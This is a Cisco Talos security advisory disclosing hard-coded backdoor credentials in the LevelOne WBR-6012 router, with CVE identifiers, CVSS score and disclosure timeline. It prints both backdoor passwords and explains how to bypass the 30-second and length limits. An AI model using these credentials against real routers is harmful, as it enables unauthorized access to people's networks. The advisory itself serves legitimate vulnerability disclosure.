CVE-2024-28875,CVE-2024-31151
A security flaw involving hard-coded credentials in LevelOne WBR-6012’s web services allows attackers to gain unauthorized access during the first 30 seconds post-boot. Other vulnerabilities can force a reboot, circumventing the initial time restriction for exploitation.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-798 - Use of Hard-coded Credentials
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The device is configured with two backdoors: a hard-coded admin backdoor password and an undocumented user account with hardcoded password.
During the first 30 seconds after a (re)boot, a backdoor is accessible using the hardcoded password “@m!t2K1” via the web application. An attacker can use any of several other vulnerabilities to trigger a reboot of the device, eliminating the 30 second limitation.
An undocumented “user” account exists with hard-coded password of “AriesSerenaCairryNativitaMegan”. There is no functionality within the device’s configuration and management functionality to remove or modify this user or their credentials. The web application limits the password length to 9 characters however by disabling this limitation with the browser’s developer tools, or by submitting an authentication request outside of the browser, using this password will authenticate the sender’s IP address with user-level privileges.
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Francesco Benvenuto and Patrick DeSantis of Cisco Talos.